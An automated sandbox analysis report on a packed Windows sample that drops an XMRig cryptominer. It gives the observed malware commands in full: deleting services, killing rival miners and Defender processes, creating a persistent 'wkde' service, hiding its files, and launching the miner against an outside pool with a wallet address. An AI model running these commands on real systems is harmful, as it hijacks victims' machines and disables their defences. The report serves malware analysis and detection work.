Malware Analysis Report

2025-01-22 12:52

Sample ID 240520-mgkqtafc54
Target 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118
SHA256 1faff4cf4bfe0d40af1555dc2ca749c5a382197b51b327ad89c4734d6ba75ee3
Tags xmrig evasion execution miner persistence vmprotect
Score 10/10

Analysis Overview

Threat Level: Known bad

The file 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

xmrig

XMRig Miner payload

Sets file to hidden

Creates new service(s)

Stops running service(s)

Loads dropped DLL

VMProtect packed file

Executes dropped EXE

Checks computer location settings

Deletes itself

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Runs net.exe

Kills process with taskkill

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Analysis: static1

Detonation Overview

Reported 2024-05-20 10:26

Signatures

Unsigned PE

Analysis: behavioral2

Detonation Overview

Submitted 2024-05-20 10:26
Reported 2024-05-20 10:28
Platform win10v2004-20240426-en
Max time kernel 150s
Max time network 154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Creates new service(s)

persistence execution

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\WINDOWS\Debug\wkde\mscorsvw.exe N/A
N/A N/A C:\WINDOWS\Debug\wkde\svchost.exe N/A

VMProtect packed file

vmprotect

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\debug\wkde C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\mscorsvw.ini C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File created C:\Windows\debug\wkde\svchost.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\svchost.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.ini C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Windows\debug\__tmp_rar_sfx_access_check_240601796 C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File created C:\Windows\debug\wkde\mscorsvw.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.log C:\WINDOWS\Debug\wkde\mscorsvw.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\svchost.exe C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Windows\debug\wkde\mscorsvw.ini C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File created C:\Windows\debug\wkde\wk.bat C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\wk.bat C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.log C:\Windows\SysWOW64\attrib.exe N/A
File created C:\WINDOWS\Debug\wkde\mscorsvw.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\mscorsvw.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A

Enumerates physical storage devices

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\WINDOWS\Debug\wkde\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1376 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 4320 wrote to memory of 940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 1280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 3560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 2268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 3844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4376 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4508 wrote to memory of 4144 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4320 wrote to memory of 1236 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4320 wrote to memory of 3220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\WINDOWS\Debug\wkde\wk.bat" "

C:\Windows\SysWOW64\sc.exe

sc delete Systemss

C:\Windows\SysWOW64\sc.exe

sc delete WMIserver

C:\Windows\SysWOW64\sc.exe

sc delete WMIservers

C:\Windows\SysWOW64\sc.exe

sc delete WMI

C:\Windows\SysWOW64\sc.exe

sc delete Serv

C:\Windows\SysWOW64\sc.exe

sc delete system_update

C:\Windows\SysWOW64\sc.exe

sc delete system_updatea

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im spoolsvs.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im taskhost.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im NsCpuapl.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im MSASCui.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im nheqminer_zcash.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im nssm.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im update.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im server.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im sppscv.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im taskhost.exe

C:\Windows\SysWOW64\net.exe

net stop wkde

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wkde

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\taskkill.exe

taskkill /im mscorsvw.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im WUDFHost.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im nheqminer.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im NsCpuCNMiner32.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im NsCpuCNMiner64.exe /f

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\sc.exe

sc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto

C:\Windows\SysWOW64\net.exe

net start wkde

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start wkde

C:\WINDOWS\Debug\wkde\mscorsvw.exe

C:\WINDOWS\Debug\wkde\mscorsvw.exe

C:\WINDOWS\Debug\wkde\svchost.exe

C:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1%

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log

Network

Files

C:\WINDOWS\Debug\wkde\wk.bat

MD5 816d97b2dca2af96209ef913291d59be
SHA1 a3c480a7e333a1623e7cd8194d68468397c3f6d1
SHA256 ccf0010fcc0783096c0323c3bbe6a88a4d969c8b327626d1eb5b493e03a8e54d
SHA512 54bbff4724a8b2065273f118aa1eeb61542df82fc853e01155470053b8f18cd9e1c0f8618c077dab13767e187f93653842a8df852496e5bdf7e2dd7fc0120088

C:\Windows\debug\wkde\mscorsvw.exe

MD5 cbb4ca806e69a4880dd02e04e5bce18b
SHA1 1e838ddad7b04a1f2be935f6fe8e7cff3466c4d7
SHA256 2cadd79540acdfcc6d99875a79ed7c35fd3508e5ba6c29c9caae598fcc40b79b
SHA512 6240fcdf8899c8d62357ad4cfe4c749517fa91c81d8765f2e1b3e23fdf95cdde09f8954da5b5f0ef1e0fa7e34d88e5dd7070134eefc40f98a6b6264f18a295a6

C:\WINDOWS\Debug\wkde\mscorsvw.ini

MD5 d298cd48c88433017ef4e66af740830e
SHA1 e0ef455dc4df16948d85c5a058d0980ce5020822
SHA256 b22ef4711432e08a93b9ef241616e51f17744a762e47b1d871aeabb6d4ae5d89
SHA512 5927b46c620a5b91b072ac48d7c5f2a98eff1984c8b82ae636512ebcfbb1a9d3b122f4cae81c802da4a81b0c5ee3143a931eaf42844226b7ea6aeaeceb12b8fe

C:\Windows\debug\wkde\svchost.exe

MD5 79a1ec8d32e8e3032b5f5126c11f2216
SHA1 86dc55fcdc358a5c6699c41582b66b75bedc4086
SHA256 d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8
SHA512 a80fa204f05a5be209a945af9c5f8e6773c338a3cb5bd526c29e78932ed04d2c625dcb3fe5e918b07b316ba6981bb517714ad524a37f73f6055600ae1c145106

C:\WINDOWS\Debug\wkde\mscorsvw.log

MD5 0a98d172405546d83c748505a590f268
SHA1 0a107d99277cc976260d59d60ea2e513a5280688
SHA256 cb4075e76b795f5a464a50114628b2d62e3546aa9735a0ebffef29b3e94bdcac
SHA512 89c091858c44cd0055a33de6fd89b20f0735bdb071f03158b76ae312af8901827f3fd26c3c7f12cfe777e42f1d4f7874da30770b3ebcb4fadd79543d100af0ef

Analysis: behavioral1

Detonation Overview

Submitted 2024-05-20 10:26
Reported 2024-05-20 10:28
Platform win7-20240220-en
Max time kernel 148s
Max time network 121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Creates new service(s)

persistence execution

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Stops running service(s)

evasion execution

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\WINDOWS\Debug\wkde\mscorsvw.exe N/A
N/A N/A C:\WINDOWS\Debug\wkde\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\WINDOWS\Debug\wkde\mscorsvw.exe N/A

VMProtect packed file

vmprotect

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.log C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Windows\debug\wkde\mscorsvw.ini C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File created C:\Windows\debug\wkde\svchost.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\svchost.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File created C:\Windows\debug\wkde\wk.bat C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\wk.bat C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.ini C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Windows\debug\__tmp_rar_sfx_access_check_259395217 C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File created C:\Windows\debug\wkde\mscorsvw.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File created C:\WINDOWS\Debug\wkde\mscorsvw.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\mscorsvw.ini C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.log C:\WINDOWS\Debug\wkde\mscorsvw.exe N/A
File opened for modification C:\Windows\debug\wkde C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\mscorsvw.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\svchost.exe C:\Windows\SysWOW64\attrib.exe N/A

Enumerates physical storage devices

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\WINDOWS\Debug\wkde\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2184 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2484 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2484 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 2440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2484 wrote to memory of 356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\WINDOWS\Debug\wkde\wk.bat" "

C:\Windows\SysWOW64\sc.exe

sc delete Systemss

C:\Windows\SysWOW64\sc.exe

sc delete WMIserver

C:\Windows\SysWOW64\sc.exe

sc delete WMIservers

C:\Windows\SysWOW64\sc.exe

sc delete WMI

C:\Windows\SysWOW64\sc.exe

sc delete Serv

C:\Windows\SysWOW64\sc.exe

sc delete system_update

C:\Windows\SysWOW64\sc.exe

sc delete system_updatea

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im spoolsvs.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im taskhost.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im NsCpuapl.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im MSASCui.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im nheqminer_zcash.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im nssm.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im update.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im server.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im sppscv.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im taskhost.exe

C:\Windows\SysWOW64\net.exe

net stop wkde

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wkde

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\taskkill.exe

taskkill /im mscorsvw.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im WUDFHost.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im nheqminer.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im NsCpuCNMiner32.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im NsCpuCNMiner64.exe /f

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\sc.exe

sc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto

C:\Windows\SysWOW64\net.exe

net start wkde

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start wkde

C:\WINDOWS\Debug\wkde\mscorsvw.exe

C:\WINDOWS\Debug\wkde\mscorsvw.exe

C:\WINDOWS\Debug\wkde\svchost.exe

C:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1%

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log

Network

Country Destination Domain Proto
US 8.8.8.8:53 pool.minexmr.com udp

Files

C:\Windows\debug\wkde\wk.bat

MD5 816d97b2dca2af96209ef913291d59be
SHA1 a3c480a7e333a1623e7cd8194d68468397c3f6d1
SHA256 ccf0010fcc0783096c0323c3bbe6a88a4d969c8b327626d1eb5b493e03a8e54d
SHA512 54bbff4724a8b2065273f118aa1eeb61542df82fc853e01155470053b8f18cd9e1c0f8618c077dab13767e187f93653842a8df852496e5bdf7e2dd7fc0120088

C:\Windows\debug\wkde\mscorsvw.exe

MD5 cbb4ca806e69a4880dd02e04e5bce18b
SHA1 1e838ddad7b04a1f2be935f6fe8e7cff3466c4d7
SHA256 2cadd79540acdfcc6d99875a79ed7c35fd3508e5ba6c29c9caae598fcc40b79b
SHA512 6240fcdf8899c8d62357ad4cfe4c749517fa91c81d8765f2e1b3e23fdf95cdde09f8954da5b5f0ef1e0fa7e34d88e5dd7070134eefc40f98a6b6264f18a295a6

memory/2164-24-0x0000000000400000-0x000000000055E000-memory.dmp

C:\WINDOWS\Debug\wkde\svchost.exe

MD5 79a1ec8d32e8e3032b5f5126c11f2216
SHA1 86dc55fcdc358a5c6699c41582b66b75bedc4086
SHA256 d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8
SHA512 a80fa204f05a5be209a945af9c5f8e6773c338a3cb5bd526c29e78932ed04d2c625dcb3fe5e918b07b316ba6981bb517714ad524a37f73f6055600ae1c145106

memory/2164-25-0x0000000000400000-0x000000000055E000-memory.dmp

C:\WINDOWS\Debug\wkde\mscorsvw.ini

MD5 d298cd48c88433017ef4e66af740830e
SHA1 e0ef455dc4df16948d85c5a058d0980ce5020822
SHA256 b22ef4711432e08a93b9ef241616e51f17744a762e47b1d871aeabb6d4ae5d89
SHA512 5927b46c620a5b91b072ac48d7c5f2a98eff1984c8b82ae636512ebcfbb1a9d3b122f4cae81c802da4a81b0c5ee3143a931eaf42844226b7ea6aeaeceb12b8fe

C:\WINDOWS\Debug\wkde\mscorsvw.log

MD5 df296d0aa6eb740c57059aa9f47fd46c
SHA1 de668e0436d036c2608b3a16fbfaaf3cbfd52a59
SHA256 3d8e422765d4e10add74a69d85ea827b90dbc2c25d021185f1bf1fbe3363823a
SHA512 db6ef5caf3a7c682a64fe18583e2f91dc9b5fe71a274eaf5e0112246cc04b6a44abe5af7cececf73a3411f4364357acc92400b70c6d3fdd0854b4732126a8fc5

memory/444-35-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-36-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/2164-37-0x0000000000400000-0x000000000055E000-memory.dmp

memory/444-38-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-39-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-40-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-41-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-42-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-43-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-44-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-45-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-46-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-47-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/444-48-0x0000000000400000-0x00000000004B5000-memory.dmp